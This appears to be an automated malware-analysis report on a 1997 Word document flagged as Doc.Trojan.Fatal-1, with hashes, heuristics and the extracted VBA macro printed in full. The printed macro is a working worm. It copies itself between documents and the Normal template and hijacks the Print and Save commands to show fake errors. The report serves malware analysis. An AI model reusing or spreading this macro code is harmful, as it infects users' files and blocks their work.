Office (OLE) malware analysis — malicious · 158c0350023154b6

MALICIOUS

Office (OLE)

28.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f4d965089b9572c1659f5e4c55fa1b38 SHA-1: de981eb632e4cd065ba7da0ea738d882dd90571b SHA-256: 158c0350023154b6ddf42c7974abced932318d3222058db5bbbcee0d5763eb5c

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The script attempts to hijack the 'Print' and 'Save' commands, displaying custom error messages and potentially overwriting the document's own macros with its code. This behavior suggests an attempt to hinder analysis or user interaction with the document.

Heuristics 3

ClamAV: Doc.Trojan.Fatal-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Fatal-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2022 bytes
SHA-256: `547dc19dcbe2e1567d677531a5573f96c4e09459cac6c9946e7df092f06f4b90`
Detection ClamAV: Doc.Trojan.Fatal-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '#WORM# Private preventSave As Boolean Private Sub Document_New() preventSave = True On Error Resume Next Document_Open End Sub Private Sub WORMprint() On Error Resume Next MsgBox "Cannot print this document." + vbLf + "Server does not response.", vbCritical Or vbSystemModal, "Fatal error" End Sub Private Sub WORMsave() On Error Resume Next MsgBox "Cannot save this document." + vbLf + "Disk might be damaged or read protected.", vbCritical Or vbSystemModal, "Fatal error" End Sub Private Sub Document_Open() On Error Resume Next Set adoc = ActiveDocument.VBProject.VBComponents.Item(1) Set ntem = NormalTemplate.VBProject.VBComponents.Item(1) CommandBars("file").Controls("Печать...").OnAction = "WORMprint" CommandBars("standard").Controls("Печать").OnAction = "WORMprint" CommandBars("file").Controls("Сохранить").OnAction = "WORMsave" CommandBars("standard").Controls("Сохранить").OnAction = "WORMsave" If adoc.CodeModule.lines(1, 1) <> "'#WORM#" Then BGN = 1: adoc.CodeModule.DeleteLines 1, adoc.CodeModule.CountOfLines Do: adoc.CodeModule.insertlines BGN, ntem.CodeModule.lines(BGN, 1) BGN = BGN + 1 Loop Until ntem.CodeModule.lines(BGN, 1) = "" If Not preventSave Then If Not ActiveDocument.ReadOnly Then If ActiveDocument.ReadOnlyRecommended Then ActiveDocument.ReadOnlyRecommended = False ActiveDocument.Save End If End If End If If ntem.CodeModule.lines(1, 1) <> "'#WORM#" Then BGN = 1: ntem.CodeModule.DeleteLines 1, ntem.CodeModule.CountOfLines Do: ntem.CodeModule.insertlines BGN, adoc.CodeModule.lines(BGN, 1) BGN = BGN + 1 Loop Until adoc.CodeModule.lines(BGN, 1) = "" End If preventSave = False End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.